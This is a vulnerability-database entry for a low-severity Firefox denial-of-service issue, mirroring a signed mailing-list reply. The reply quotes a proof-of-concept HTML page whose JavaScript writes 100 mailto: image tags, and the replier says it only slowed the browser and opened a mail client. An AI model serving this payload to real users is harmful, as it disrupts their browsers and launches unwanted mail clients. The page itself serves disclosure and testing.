Firefox - DoS

Risk: Medium
Local: Yes
Remote: Yes

CVSS Base Score: 2.6/10
Impact Subscore: 2.9/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 p4.werterxyz (at) gmail (dot) com [email concealed] wrote: > test2: > > Did not crash FF on Windows Server 2003 SP1 (slowed it down for a few seconds and launched Outlook Express, but that's it). Here is the code since the original poster didn't see fit to publish it. <Head> <Title>test2 by P4</Title> </Head> <Body> <!-- following code added by server. PLEASE REMOVE --> <!-- preceding code added by server. PLEASE REMOVE --> <SCRIPT Language="Javascript"> for(i=0; i<100; i++){ document.write('<Img src="mailto:test (at) test (dot) com [email concealed]?subject=test email&body=Sei fottuto!"> clicka col tasto destro del mouse e seleziona "Mostra immagine" (View Image)') } </SCRIPT> </Body> <!-- text below generated by server. PLEASE REMOVE - --></object></layer></div></span></style></noscript></table></script></a pplet><script language="JavaScript" src=""></script><script language="JavaScript" src=""></script><script language="javascript">geovisit();</script><noscript><img src="" alt="setstats" border="0" width="1" height="1"></noscript> <IMG SRC="" ALT=1 WIDTH=1 HEIGHT=1> > > Saluti da P4 - -- Chris Horry KG4TSM "A conservative is a man with two perfectly zerbey (at) (dot) uk [email concealed] good legs who, however, has never learned how to walk forward". -- Franklin D. Roosevelt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (MingW32) Comment: Using GnuPG with Mozilla - iD8DBQFEYj3pnAAeGCtMZU4RAuEAAJ92SdxcNR0ALLdqrC6/CgTOve8UXwCfRkgF 9DAmdMxX5LaboCYnYTtr4GM= =z8eV -----END PGP SIGNATURE-----

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017,


Back to Top